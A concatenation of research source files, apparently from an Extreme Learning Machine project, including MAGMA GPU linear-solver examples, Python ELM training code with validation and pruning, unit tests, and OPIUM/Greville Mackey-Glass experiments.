goto cleanup;
}
magma_dsetmatrix( m, n, X, m, dX, m );
magma_dsetmatrix( m, nrhs, T, m, dT, m );
time = magma_sync_wtime( NULL );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, nrhs, m,
1, dX, m,
dT, m,
1, dB, n );
magma_dgemm( MagmaTrans, MagmaNoTrans, n, n, m,
1, dX, m,
dX, m,
1, dA, n );
time = magma_sync_wtime( NULL ) - time;
fprintf( stdout, "added data in %f sec\n", time );
cleanup:
magma_free( dX );
magma_free( dT );
};
// Solve dA * dX = dB, where dA and dX are stored in GPU device memory.
// Internally, MAGMA uses a hybrid CPU + GPU algorithm.
void GpuSolver::solve( magmaDouble_ptr X )
{
real_Double_t gpu_time;
magmaDouble_ptr dX=NULL, dWORKD=NULL, Z=NULL;
float *dWORKS=NULL;
magma_int_t qrsv_iters;
magma_int_t info = 0;
magma_dmalloc( &dX, n*nrhs );
magma_dmalloc( &dWORKD, n*nrhs );
magma_smalloc( &dWORKS, n*(n+nrhs) );
if ( dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
goto cleanup;
}
gpu_time = magma_wtime();
magma_dsposv_gpu( MagmaUpper, n, nrhs,
dA, n, dB, n, dX, n,
dWORKD, dWORKS, &qrsv_iters, &info );
gpu_time = magma_wtime() - gpu_time;
fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%d\n", info ); }
magma_dgetmatrix( n, nrhs, dX, n, X, n );
cleanup:
magma_free( dX );
}
// ------------------------------------------------------------
void dfill_matrix( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
#define A(i_, j_) A[ (i_) + (j_)*lda ]
magma_int_t i, j;
for( j=0; j < n; ++j ) {
for( i=0; i < m; ++i ) {
A(i,j) = rand() / ((double) RAND_MAX);
}
}
}
int main( int argc, char** argv )
{
magma_int_t n = 15000;
magma_int_t lda = n;
magma_int_t ldx = lda;
magma_int_t nrhs = 1000;
printf( "using MAGMA GPU interface\n" );
GpuSolver g = GpuSolver(n, nrhs);
// fill some data
magmaDouble_ptr A=NULL, B=NULL;
magma_dmalloc_cpu( &A, n*n );
magma_dmalloc_cpu( &B, n*nrhs );
for (int i = 0; i < 2; i++) {
dfill_matrix( n, n, A, n );
dfill_matrix( n, nrhs, B, n );
g.add_data( n, A, B );
};
magmaDouble_ptr X=NULL;
magma_dmalloc_cpu( &X, n*nrhs );
g.solve( X );
magma_free_cpu( A );
magma_free_cpu( B );
magma_free_cpu( X );
return 0;
}
<file_sep>// This is a simple standalone example. See README.txt
#include <stdio.h>
#include <stdlib.h>
//#include "cublas_v2.h" // if you need CUBLAS, include before magma.h
#include "magma.h"
//#include "magma_lapack.h" // if you need BLAS & LAPACK
void dfill_matrix( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
#define A(i_, j_) A[ (i_) + (j_)*lda ]
magma_int_t i, j;
for( j=0; j < n; ++j ) {
for( i=0; i < m; ++i ) {
A(i,j) = rand() / ((double) RAND_MAX);
}
}
}
void dprint( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
#define A(i_, j_) A[ (i_) + (j_)*lda ]
magma_int_t i, j;
for( j=0; j < n; ++j ) {
for( i=0; i < m; ++i ) {
fprintf(stdout, "%.03f ", A(i,j));
}
//fprintf(stdout, "\n");
}
fprintf(stdout, "\n");
}
void dprint2( magma_int_t m, magma_int_t n, magmaDouble_ptr A, magma_int_t lda )
{
#define A(i_, j_) A[ (i_) + (j_)*lda ]
magma_int_t i, j;
for( j=0; j < n; ++j ) {
for( i=0; i < m; ++i ) {
fprintf(stdout, "%.03f ", A(i,j));
}
fprintf(stdout, "\n");
}
fprintf(stdout, "\n");
}
// ------------------------------------------------------------
// Solve dA * dX = dB, where dA and dX are stored in GPU device memory.
// Internally, MAGMA uses a hybrid CPU + GPU algorithm.
void gpu_solve( magma_int_t n, magma_int_t nrhs, magmaDouble_ptr A, magmaDouble_ptr B, magmaDouble_ptr X )
{
magma_init();
real_Double_t gpu_time;
magmaDouble_ptr dA=NULL, dB=NULL, dX=NULL, dWORKD=NULL;
float *dWORKS=NULL;
magma_int_t qrsv_iters;
magma_int_t info = 0;
magma_dmalloc( &dA, n*n );
magma_dmalloc( &dB, n*nrhs );
magma_dmalloc( &dX, n*nrhs );
magma_dmalloc( &dWORKD, n*nrhs );
magma_smalloc( &dWORKS, n*(n+nrhs) );
if ( dA == NULL || dB == NULL || dX == NULL || dWORKD == NULL || dWORKS == NULL ) {
fprintf( stderr, "malloc failed - not enough GPU memory?\n" );
goto cleanup;
}
// send data to GPU (round n to ldda)
magma_dsetmatrix( n, n, A, n, dA, n );
magma_dsetmatrix( n, nrhs, B, n, dB, n );
//gpu_time = magma_wtime();
//magma_dsgesv_gpu( MagmaNoTrans, n, nrhs,
// dA, ldda, ipiv, d_ipiv,
// dB, lddb, dX, lddx,
// dWORKD, dWORKS, &qrsv_iters, &info );
//gpu_time = magma_wtime() - gpu_time;
//fprintf( stdout, "DSGESV GPU time = %fs with %d iterations (info %d)\n", gpu_time, qrsv_iters, info);
gpu_time = magma_wtime();
magma_dsposv_gpu( MagmaUpper, n, nrhs,
dA, n, dB, n, dX, n,
dWORKD, dWORKS, &qrsv_iters, &info );
gpu_time = magma_wtime() - gpu_time;
fprintf( stdout, "DSPOSV GPU solution time = %fs\n", gpu_time);
if ( qrsv_iters == -3 ) {fprintf( stderr, "cannot factor input matrix in single precision, bad initialization?\n"); }
if ( info != 0 ) { fprintf( stderr, "magma_dsposv_gpu failed with info=%d\n", info ); }
magma_dgetmatrix( n, nrhs, dX, n, X, n );
cleanup:
magma_free( dA );
magma_free( dB );
magma_free( dX );
magma_finalize();
}
// ------------------------------------------------------------
int main( int argc, char** argv )
{
magma_init();
magma_int_t n = 20000;
magma_int_t lda = n;
magma_int_t ldx = lda;
magma_int_t nrhs = 1000;
printf( "using MAGMA GPU interface\n" );
magmaDouble_ptr A=NULL, B=NULL, X=NULL;
magma_dmalloc_cpu( &A, lda*n );
magma_dmalloc_cpu( &B, ldx*nrhs );
magma_dmalloc_cpu( &X, n*nrhs );
dfill_matrix( n, n, A, n );
dfill_matrix( n, nrhs, B, n );
gpu_solve( n, nrhs, A, B, X );
magma_free_cpu( A );
magma_free_cpu( B );
magma_free_cpu( X );
magma_finalize();
return 0;
}
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 18:18:35 2015
@author: akusok
"""
import numpy as np
from numpy.linalg import pinv, inv, norm
from numpy import dot
#@profile
def prepare():
N = 125
nn = 5
o = 2
H = np.random.randn(N, nn)
W = np.random.randn(nn, o)
T = dot(H,W) + np.random.randn(N,o)*(0.01/6)
# basic
HH = H.T.dot(H)
HT = H.T.dot(T)
P = inv(HH)
B = P.dot(HT)
# 10-N
j = 10
H0 = H[j:]
T0 = T[j:]
HH0 = H0.T.dot(H0)
HT0 = H0.T.dot(T0)
P0 = inv(HH0)
B0 = P0.dot(HT0)
# N substract 10
H1 = H[:j]
T1 = T[:j]
#a = inv(np.eye(j) + H1.dot(P0).dot(H1.T)) # +
#P1 = P0 - P0.dot(H1.T).dot(a).dot(H1).dot(P0) # -
#B1 = P1.dot(H1.T).dot(T1) + (np.eye(nn) - P1.dot(H1.T).dot(H1)).dot(B0) # + -
a = inv(np.eye(j) - H1.dot(P).dot(H1.T)) # +
P1 = P + P.dot(H1.T).dot(a).dot(H1).dot(P) # -
#P1 = inv(HH - H1.T.dot(H1))
B1 = B - P1.dot(H1.T).dot(T1) + P1.dot(H1.T).dot(H1).dot(B) # + -
print norm(B0-B1)
prepare()
print "Done"
<file_sep> # -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from slfn import SLFN
from hpelm.modules import mrsr, mrsr2
from mss_v import train_v
from mss_cv import train_cv
from mss_loo import train_loo
class ELM(SLFN):
"""Interface for training Extreme Learning Machines.
"""
def train(self, X, T, *args, **kwargs):
"""Universal training interface for ELM model with model structure selection.
:param X: input data matrix
:param T: target data matrix
Model structure selection (exclusive, choose one)
:param "V": use validation set
:param "CV": use cross-validation
:param "LOO": use leave-one-out validation
Additional parameters for model structure selecation
:param Xv: validation data X ("V")
:param Tv: validation targets T ("V")
:param k: number of splits ("CV")
Ranking of hidden neurons
:param "OP": use Optimal Pruning (OP-ELM)
:param "kmax": maximum number of neurons (with "OP")
System setup
:param "classification"/"c": build ELM for classification
:param "weighted classification"/"wc": build ELM with weights assigned to classes
:param w: weights of classes for "wc"
:param "multiclass"/"mc": build ELM for multiclass classification
:param "adaptive"/"ad": build adaptive ELM for non-stationary model
:param "batch": batch size for adaptive ELM (sliding window step size)
"""
assert len(self.neurons) > 0, "Add neurons to ELM before training it"
X, T = self._checkdata(X, T)
args = [a.upper() for a in args] # make all arguments upper case
# kind of "enumerators", try to use only inside that script
MODELSELECTION = None # V / CV / MCCV / LOO / None
ADAPTIVE = False # batch / None
# reset parameters
self.ranking = None
self.kmax_op = None
self.classification = None # c / wc / mc
self.weights_wc = None # weigths for weighted classification
# check exclusive parameters
assert len(set(args).intersection(set(["V", "CV", "LOO"]))) <= 1, "Use only one of V / CV / LOO"
assert len(set(args).intersection(set(["C", "WC", "MC"]))) <= 1, "Use only one of \
C (classification) / MC (multiclass) / WC (weighted classification)"
# parse parameters
for a in args:
if a == "V": # validation set
assert "Xv" in kwargs.keys(), "Provide validation dataset (Xv)"
assert "Tv" in kwargs.keys(), "Provide validation targets (Tv)"
Xv = kwargs['Xv']
Tv = kwargs['Tv']
Xv, Tv = self._checkdata(Xv, Tv)
MODELSELECTION = "V"
if a == "CV":
assert "k" in kwargs.keys(), "Provide Cross-Validation number of splits (k)"
k = kwargs['k']
assert k >= 3, "Use at least k=3 splits for Cross-Validation"
MODELSELECTION = "CV"
if a == "LOO":
MODELSELECTION = "LOO"
if a == "OP":
self.ranking = "OP"
if "kmax" in kwargs.keys():
self.kmax_op = int(kwargs["kmax"])
if a == "C":
assert self.targets > 1, "Classification targets must have 1 output per class"
self.classification = "c"
if a == "WC":
assert self.targets > 1, "Classification targets must have 1 output per class"
assert "w" in kwargs.keys(), "Provide class weights for weighted classification"
w = kwargs['w']
assert len(w) == T.shape[1], "Number of class weights differs from number of target classes"
self.weights_wc = w
self.classification = "wc"
if a == "MC":
assert self.targets > 1, "Classification targets must have 1 output per class"
self.classification = "mc"
# if a in ("A", "AD", "ADAPTIVE"):
# assert "batch" in kwargs.keys(), "Provide batch size for adaptive ELM model (batch)"
# batch = kwargs['batch']
# ADAPTIVE = True
# use "train_x" method which borrows _project(), _error() from the "self" object
if MODELSELECTION == "V":
train_v(self, X, T, Xv, Tv)
elif MODELSELECTION == "CV":
train_cv(self, X, T, k)
elif MODELSELECTION == "LOO":
train_loo(self, X, T)
else:
self._train(X, T)
def _train(self, X, T):
"""Most basic training algorithm for an ELM.
"""
self.Beta = self._project(X, T, solve=True)[2]
def _project(self, X, T, solve=False):
"""Create HH, HT matrices and computes solution Beta.
An ELM-specific projection for all usage cases.
Returns solution Beta if solve=True.
Runs on GPU if self.accelerator="GPU".
Performs balanced classification if self.classification="cb".
"""
# initialize
nn = sum([n1[1] for n1 in self.neurons])
batch = max(self.batch, nn)
if X.shape[0] % batch > 0:
nb = X.shape[0]/batch + 1
else:
nb = X.shape[0]/batch
# GPU script
def proj_gpu(self, X, T, getBeta, nn, nb):
s = self.magma_solver.GPUSolver(nn, self.targets, self.alpha)
for X0, T0 in zip(np.array_split(X, nb, axis=0),
np.array_split(T, nb, axis=0)):
H0 = self.project(X0)
s.add_data(H0, T0)
HH, HT = s.get_corr()
if getBeta:
Beta = s.solve()
else:
Beta = None
return HH, HT, Beta
# CPU script
def proj_cpu(self, X, T, getBeta, nn, nb):
HH = np.zeros((nn, nn))
HT = np.zeros((nn, self.targets))
HH.ravel()[::nn+1] += self.alpha # add to matrix diagonal trick
for X0, T0 in zip(np.array_split(X, nb, axis=0),
np.array_split(T, nb, axis=0)):
H0 = self.project(X0)
HH += np.dot(H0.T, H0)
HT += np.dot(H0.T, T0)
if getBeta:
Beta = self._solve_corr(HH, HT)
else:
Beta = None
return HH, HT, Beta
# run scripts
if self.classification == "cb": # balanced classification wrapper
ns = T.sum(axis=0).astype(np.float64) # number of samples in classes
wc = (ns / ns.sum())**-1 # weights of classes
HH = np.zeros((nn, nn)) # init data holders
HT = np.zeros((nn, self.targets))
for i in range(wc.shape[0]): # iterate over each particular class
idxc = T[:, i] == 1
Xc = X[idxc]
Tc = T[idxc]
if self.accelerator == "GPU":
HHc, HTc, _ = proj_gpu(self, Xc, Tc, False, nn, nb)
else:
HHc, HTc, _ = proj_cpu(self, Xc, Tc, False, nn, nb)
HH += HHc * wc[i]
HT += HTc * wc[i]
if solve: # obtain solution
Beta = self._solve_corr(HH, HT)
else:
if self.accelerator == "GPU":
HH, HT, Beta = proj_gpu(self, X, T, solve, nn, nb)
else:
HH, HT, Beta = proj_cpu(self, X, T, solve, nn, nb)
# return results
if solve:
return HH, HT, Beta
else:
return HH, HT
def _error(self, Y, T, R=None):
"""Returns regression/classification/multiclass error, also for PRESS.
An ELM-specific error with PRESS support.
"""
if R is None: # normal classification error
if self.classification == "c":
err = np.mean(Y.argmax(1) != T.argmax(1))
elif self.classification == "wc": # weighted classification
c = T.shape[1]
errc = np.zeros(c)
for i in xrange(c): # per-class MSE
idx = np.where(T[:, i] == 1)[0]
if len(idx) > 0:
errc[i] = np.mean(Y[idx].argmax(1) != i)
err = np.mean(errc * self.weights_wc)
elif self.classification == "mc":
err = np.mean((Y > 0.5) != (T > 0.5))
else:
err = np.mean((Y - T)**2)
else: # LOO_PRESS error
if self.classification == "c":
err = (Y.argmax(1) != T.argmax(1)).astype(np.float) / R.ravel()
err = np.mean(err**2)
elif self.classification == "wc": # balanced classification
c = T.shape[1]
errc = np.zeros(c)
for i in xrange(c): # per-class MSE
idx = np.where(T[:, i] == 1)[0]
if len(idx) > 0:
t = (Y[idx].argmax(1) != i).astype(np.float) / R[idx].ravel()
errc[i] = np.mean(t**2)
err = np.mean(errc * self.weights_wc)
elif self.classification == "mc":
err = ((Y > 0.5) != (T > 0.5)).astype(np.float) / R.reshape((-1, 1))
err = np.mean(err**2)
else:
err = (Y - T) / R.reshape((-1, 1))
err = np.mean(err**2)
assert not np.isnan(err), "Error is NaN at %s" % self.classification
return err
def _ranking(self, nn, H=None, T=None):
"""Return ranking of hidden neurons; random or OP.
"""
if self.ranking == "OP":
if self.kmax_op is None: # set maximum number of neurons
self.kmax_op = nn
else: # or set a limited number of neurons
nn = self.kmax_op
if T.shape[1] < 10: # fast mrsr for less outputs but O(2^t) in outputs
rank = mrsr(H, T, self.kmax_op)
else: # slow mrsr for many outputs but O(t) in outputs
rank = mrsr2(H, T, self.kmax_op)
else:
rank, nn = super(ELM, self)._ranking(nn)
return rank, nn
<file_sep>#include <math.h>
void mp_func(double *H, const int *f, int n, int k)
{
int i, j, ofc;
#pragma omp parallel for private(i, j, ofc)
for (i=0; i<n; i++) {
for (j=0; j<k; j++) {
if (f[j] == 1) {
ofc = i*k + j;
H[ofc] = tanh(H[ofc]);
}
}
}
}<file_sep>"""
Greville and OPIUM method for classifying Mackey-Glass from:
<NAME> and <NAME>,
"Learning the Pseudoinverse Solution to Network Weights"
Neural Networks
Used for Figure 3.
@author: andrevanschaik
"""
from pylab import *
from numpy import *
from OPIUM import *
# Simulation parameters
dt = 0.1 # time step
maxtime = 4000 # simulation stop time
alpha =1.0 # learning rate for OPIUM
# generate Mackey-Glass series
a = 0.2
b = 0.1
tau = 170
mg = ones(maxtime)
mg[0] = 0.000001
for t in range (tau,maxtime-1):
mg[t+1] = mg[t]+((a*mg[t-tau])/(1+(pow(mg[t-tau],10)))-b*mg[t])
# Network parameters
numtaps = 4
taps = array((0,60,170,1000))
max_taps = 1000
fanout = 10
forward = 50
size_hidden = numtaps*fanout # size of hidden layer
random_weights = random.rand(size_hidden,numtaps)-0.5 # input->hidden weights
# Greville Method
# Initialisation of matrices
M = zeros((1,size_hidden)) # hidden->output weights
x = zeros((numtaps,1)) # current inputs to the network
h = zeros((size_hidden,1)) # hidden layer output
E = zeros(maxtime) # error matrix for plotting vs time
Y = zeros((1,maxtime)) # network output vs time
P = eye(size_hidden) / size_hidden # initialise correlation matrix inverse
for t in range(max_taps,maxtime-forward):
x = reshape(mg[t-taps],(numtaps,1)) # input vector
h = tanh(dot(random_weights,x)) # hidden layer activation with sigmoid
y = dot(M,h) # output value
Y[0,t+forward] = y # output is saved as the predicted sample
E[t+forward] = mg[t+forward]-y # calculate error
Greville(h,E[t+forward],M,P) # basic Greville method
# end for t
# Calculate RMS error for the last 1000 points
error_G = sqrt(mean((Y[0,maxtime-1000:maxtime]-mg[maxtime-1000:maxtime])**2))
print error_G
# Plot input, output, and error
ion()
figure(0)
plot(mg)
plot(Y[0],'r')
plot(E,'g')
savetxt('MG_Greville.txt',(mg, Y[0], E))
# OPIUM Method
# Initialisation of signal matrices
M = zeros((1,size_hidden)) # hidden->output weights
x = zeros((numtaps,1)) # current inputs to the network
h = zeros((size_hidden,1)) # hidden layer output
E_O = zeros(maxtime) # error matrix for plotting vs time
Y_O = zeros((1,maxtime)) # network output vs time
P = eye(size_hidden) / size_hidden # initialise correlation matrix inverse
for t in range(max_taps,maxtime-forward):
x = reshape(mg[t-taps],(numtaps,1)) # input vector
h = tanh(dot(random_weights,x)) # hidden layer activation with sigmoid
y = dot(M,h) # output value
Y_O[0,t+forward] = y # output is saved as the predicted sample
E_O[t+forward] = mg[t+forward]-y # calculate error
OPIUM(h,E_O[t+forward],M,P,alpha) # OPIUM method
# end for t
# Calculate RMS error for the last 1000 points
error_O = sqrt(mean((Y_O[0,maxtime-1000:maxtime]-mg[maxtime-1000:maxtime])**2))
print error_O
# Plot input, output, and error
figure(1)
plot(mg)
plot(Y_O[0],'r')
plot(E_O,'g')
savetxt('MG_Opium.txt',(mg, Y_O[0], E_O))
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Nov 5 18:42:11 2014
@author: akusok
"""
from unittest import TestCase
import numpy as np
import os
from modules import batchX, batchT, encode, decode, meanstdX, c_dictT
class TestDataLoader(TestCase):
def test_OneDimensionalX_ReshapeAddBias(self):
x1 = [1, 2, 3]
x2 = np.array([[1, 1], [2, 1], [3, 1]])
x1p = np.vstack(batchX(x1)[0])
self.assertEquals(x2.shape, x1p.shape)
self.assertTrue(np.allclose(x2, x1p))
def test_OneDimensionalY_ReshapeY(self):
y1 = np.array([4, 5, 6])
y2 = np.array([[4], [5], [6]])
y1p = np.vstack(batchT(y1)[0])
self.assertEqual(y2.shape, y1p.shape)
self.assertTrue(np.allclose(y2, y1p))
def test_Encoder1dim_CorrectEncoding(self):
y = [1, 2, 2]
cdict = {1: np.array([1, 0]), 2: np.array([0, 1])}
y1 = encode(y, cdict)
y2 = np.array([[1, 0], [0, 1], [0, 1]])
self.assertTrue(np.allclose(y1, y2))
def test_Encoder2dim_CorrectEncoding(self):
y = np.array([[1], [2], [2]])
cdict = {1: np.array([1, 0]), 2: np.array([0, 1])}
y1 = encode(y, cdict)
y2 = np.array([[1, 0], [0, 1], [0, 1]])
self.assertTrue(np.allclose(y1, y2))
def test_EncoderString_CorrectEncoding(self):
y = ['cat', 'dog', 'dog']
cdict = {'cat': np.array([1, 0]), 'dog': np.array([0, 1])}
y1 = encode(y, cdict)
y2 = np.array([[1, 0], [0, 1], [0, 1]])
self.assertTrue(np.allclose(y1, y2))
def test_Decoder1dim_CorrectDecoding(self):
y = np.array([[1, 0], [0, 1], [0, 1]])
cdict = {1: np.array([1, 0]), 2: np.array([0, 1])}
y1 = decode(y, cdict)
y2 = [1, 2, 2]
np.testing.assert_array_almost_equal(y1, y2)
def test_DecoderString_CorrectDecoding(self):
y = np.array([[1, 0], [0, 1], [0, 1]])
cdict = {'cat': np.array([1, 0]), 'dog': np.array([0, 1])}
y1 = decode(y, cdict)
y2 = ['cat', 'dog', 'dog']
self.assertEqual(y1, y2)
def test_ClassificationY_CreateTargets(self):
y = np.array([1, 1, 2, 3])
cdict = c_dictT(y)
y1 = np.vstack(batchT(y, c_dict=cdict)[0])
self.assertTrue(y1.shape[0] == 4)
self.assertTrue(y1.shape[1] == 3)
self.assertTrue(np.all(y1.sum(1) == 1))
def test_ClassificationStrings_CreateTargets(self):
y = ['cat', 'cat', 'dog', 'mouse']
cdict = c_dictT(y)
y1 = np.vstack(batchT(y, c_dict=cdict)[0])
self.assertTrue(y1.shape[0] == 4)
self.assertTrue(y1.shape[1] == 3)
self.assertTrue(np.all(y1.sum(1) == 1))
def test_meanstdX_GetMeanStd(self):
x = [[1, 2], [3, 4], [5, 6]]
m, s = meanstdX(x)
x1 = np.array(x)
self.assertTrue(np.allclose(m, x1.mean(0)))
self.assertTrue(np.allclose(s, x1.std(0)))
def test_InputTextCSV_Loads(self):
d = os.path.join(os.path.dirname(__file__), "../datasets/Unittest-Iris")
fx1 = os.path.join(d, "iris_data.txt")
fx2 = os.path.join(d, "iris_data_comma.txt")
x1 = np.vstack(batchX(fx1)[0])
x2 = np.vstack(batchX(fx2, delimiter=",")[0])
self.assertTrue(np.allclose(x1, x2))
def test_SetBatch_CorrectChunkSize(self):
x = np.random.rand(10)
x1 = batchX(x, batch=7)[0]
x2 = np.hstack((x.reshape(-1, 1), np.ones((10, 1))))
self.assertTrue(np.allclose(x2[:7], x1.next()))
self.assertTrue(np.allclose(x2[7:], x1.next()))
def test_batchX_GetNumberOfInputs(self):
x = [[1, 2], [3, 4], [5, 6]]
_, inputs, _ = batchX(x)
self.assertEqual(2, inputs)
def test_batchT_GetNumberOfTargets(self):
y = [[1, 2], [3, 4], [5, 6]]
_, targets = batchT(y)
self.assertEqual(2, targets)
def test_batchT_NumberOfClassificationTargets(self):
y = ['cat', 'cat', 'dog', 'mouse']
cdict = c_dictT(y)
_, ctargets = batchT(y, c_dict=cdict)
self.assertEqual(3, ctargets)
def test_BinaryFeatures_SkipNormalization(self):
x = [[0, 0, 5], [1, 1, 6], [1, -1, 7], [0, 0, 8]]
x = np.array(x, dtype=np.float)
meanX, stdX = meanstdX(x)
self.assertEqual(meanX[0], 0)
self.assertEqual(meanX[1], 0)
self.assertNotEqual(meanX[2], 0)
self.assertEqual(stdX[0], 1)
self.assertEqual(stdX[1], 1)
self.assertNotEqual(stdX[2], 1)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 6 18:19:18 2014
@author: akusok
"""
from sklearn import datasets
import numpy as np
from elm_naive import ELM_Naive
from mpi4py import MPI
def run_mpi():
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
if rank == 0:
iris = datasets.load_iris()
X = iris.data
Y = np.zeros((150,3))
Y[:50,0] = 1
Y[50:100,1] = 1
Y[100:,2] = 1
X = (X - np.mean(X,0)) / np.std(X,0)
else:
X = None
Y = None
elm = ELM(4,3)
elm.add_neurons(10, np.tanh)
print elm.bias
elm.train(X, Y)
Yh = elm.run(X)
if rank == 0:
print np.argmax(Yh,1) - iris.target
def run_naive():
iris = datasets.load_iris()
X = iris.data
Y = np.zeros((150,3))
Y[:50,0] = 1
Y[50:100,1] = 1
Y[100:,2] = 1
Yh = ELM_Naive(X, Y, 20, classification=True)
acc = float(np.sum(Y.argmax(1) == Yh)) / Y.shape[0]
print "%.1f%%" % (acc*100)
if __name__ == "__main__":
run_naive()
print "Done!"
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Jan 8 08:47:44 2015
@author: akusok
"""
import numpy
from numpy.linalg import norm
import reikna.cluda as cluda
from reikna.linalg import MatrixMul
import time
#@profile
def run():
api = cluda.ocl_api()
thr = api.Thread.create()
n = 3000
shape1 = (n, n)
shape2 = (n, n)
a = numpy.random.randn(*shape1).astype(numpy.float32)
b = numpy.random.randn(*shape2).astype(numpy.float32)
a_dev = thr.to_device(a)
b_dev = thr.to_device(b)
res_dev = thr.array((shape1[0], shape2[1]), dtype=numpy.float32)
dot = MatrixMul(a_dev, b_dev, out_arr=res_dev)
dotc = dot.compile(thr)
dotc(res_dev, a_dev, b_dev)
res_reference = numpy.dot(a, b)
print(norm(res_dev.get() - res_reference) / norm(res_reference) < 1e-6)
run()<file_sep># -*- coding: utf-8 -*-
"""
COMPARED BUILD-IN SINGLE VARIABLE OPTIMIZATION FUNCTION AND MY OWN IMPLEMENTATION.
MY IMPLEMENTATION CREATES 50% MORE FUNCTION CALLS.
MY IMPLEMENTATION PERFORMS BETTER BECAUSE IT CHECKS MAXIMUM AND MINIMUM NUMBERS OF NEURONS ALSO, WHILE
BUILD-IN IMPLEMENTATION CHECKS ROUGHLY 10% AND 85% BORDERS AND DOES NOT CHECK OUTSIDE THEM IF THERE IS
A LOCAL MINIMA INSIDE THAT REGION.
"""
import numpy as np
from numpy.linalg import pinv
from scipy.optimize import minimize_scalar, brenth
from slfn import SLFN
class ELM(SLFN):
"""Non-parallel Extreme Learning Machine.
"""
# inherited def _checkdata(self, X, T):
# inherited def add_neurons(self, number, func, W=None, B=None):
# inherited def project(self, X):
# inherited def predict(self, X):
# inherited def save(self, model):
# inherited def load(self, model):
def __init__(self, inputs, outputs):
"""Universal contructor of ELM model.
:param neurons: number of neurons or exact neuron
"""
super(ELM, self).__init__(inputs, outputs)
def train(self, X, T, *args, **kwargs):
"""Universal training interface for ELM model with model structure selection.
:param X: input data matrix
:param T: target data matrix
Model structure selection (exclusive, choose one)
:param "V": use validation set
:param "CV": use cross-validation
:param "LOO": use leave-one-out validation
Additional parameters for model structure selecation
:param Xv: validation data X ("V")
:param Tv: validation targets T ("V")
:param k: number of splits ("CV")
Ranking of hidden neurons
:param "HQ": use Hannan-Quinn criterion
:param "OP": use Optimal Pruning (OP-ELM)
System setup
:param "classification"/"c": build ELM for classification
:param "multiclass"/"mc": build ELM for multiclass classification
:param "adaptive"/"ad": build adaptive ELM for non-stationary model
:param "batch": batch size for adaptive ELM (sliding window step size)
"""
assert len(self.neurons) > 0, "Add neurons to ELM before training it"
X, T = self._checkdata(X, T)
args = [a.upper() for a in args] # make all arguments upper case
# kind of "enumerators", try to use only inside that script
MODELSELECTION = None # V / CV / MCCV / LOO / None
NEURONRANKING = None # HQ / OP / None
CLASSIFICATION = None # c / mc / None
ADAPTIVE = False # batch / None
Xv = None
Tv = None
k = None
batch = None
# check exclusive parameters
assert len(set(args).intersection(set(["V", "CV", "MCCV", "LOO"]))) <= 1, "Use only one of V / CV / MCCV / LOO"
assert len(set(args).intersection(set(["HQ", "OP"]))) <= 1, "Use only one of HQ / OP"
assert len(set(args).intersection(set(["C", "MC"]))) <= 1, "Use only one of classification / multiclass (c / mc)"
# parse parameters
for a in args:
if a == "V": # validation set
assert "Xv" in kwargs.keys(), "Provide validation dataset (Xv)"
assert "Tv" in kwargs.keys(), "Provide validation targets (Tv)"
Xv = kwargs['Xv']
Tv = kwargs['Tv']
Xv, Tv = self._checkdata(Xv, Tv)
MODELSELECTION = "V"
if a == "CV":
assert "k" in kwargs.keys(), "Provide Cross-Validation number of splits (k)"
k = kwargs['k']
MODELSELECTION = "CV"
if a == "LOO":
MODELSELECTION = "LOO"
if a == "HQ":
NEURONRANKING = "HQ"
if a == "OP":
NEURONRANKING = "OP"
if a in ("C", "CL", "CLASSIFICATION"):
CLASSIFICATION = "c"
if a in ("MC", "MULTICLASS"):
CLASSIFICATION = "mc"
if a in ("A", "AD", "ADAPTIVE"):
assert "batch" in kwargs.keys(), "Provide batch size for adaptive ELM model (batch)"
batch = kwargs['batch']
ADAPTIVE = True
if MODELSELECTION == "V":
self._train_v(X, T, Xv, Tv)
else:
self.Beta = self._solve(self.project(X), T)
def _project_corr(self, X, T):
"""Create correlation matrices of projected data and targets.
"""
H = self.project(X)
HH = np.dot(H.T, H)
HT = np.dot(H.T, T)
return HH, HT
def _solve(self, H, T):
"""Solve a linear system.
"""
P = pinv(H)
Beta = np.dot(P, T)
return Beta
def _error(self, Y, T):
"""Return an error for given Y and T.
Differs for classification and multiclass.
"""
err = np.mean((Y - T)**2)
return err
def _prune(self, idx):
"""Leave only neurons with the given indexes.
"""
idx = list(idx)
neurons = []
for nold in self.neurons:
k = nold[1] # number of neurons
ix1 = [i for i in idx if i < k] # index for current neuron type
idx = [i-k for i in idx if i >= k]
func = nold[0]
number = len(ix1)
W = nold[2][:, ix1]
bias = nold[3][ix1]
neurons.append((func, number, W, bias))
self.neurons = neurons
def _train_v(self, X, T, Xv, Tv):
HH, HT = self._project_corr(X, T)
Hv = self.project(Xv)
nn = Hv.shape[1]
errors = np.ones((nn,)) * -1
rank = np.arange(nn) # create ranking of neurons
np.random.shuffle(rank)
Beta = self._solve(HH, HT)
Yv = np.dot(Hv, Beta)
penalty = self._error(Yv, Tv)*0.01 / nn
def error_v(k, errors, rank, HH, HT, Hv, Tv, penalty):
if errors[k] == -1:
rank1 = rank[:k]
HH1 = HH[rank1, :][:, rank1]
HT1 = HT[rank1, :]
print k, HH1.shape, HT1.shape, k, len(rank)
B = self._solve(HH1, HT1)
Yv = np.dot(Hv[:, rank1], B)
errors[k] = self._error(Yv, Tv) + k*penalty
return errors[k]
# this works really good! same result with less re-calculations
result = minimize_scalar(error_v,
bounds=(1, nn),
args=(errors, rank, HH, HT, Hv, Tv, penalty),
method="Bounded",
tol=0.5)
print result
best_nn = rank[:result.x]
from matplotlib import pyplot as plt
plt.plot([i for i in range(nn) if errors[i]>0], [e for e in errors if e > 0], "*b")
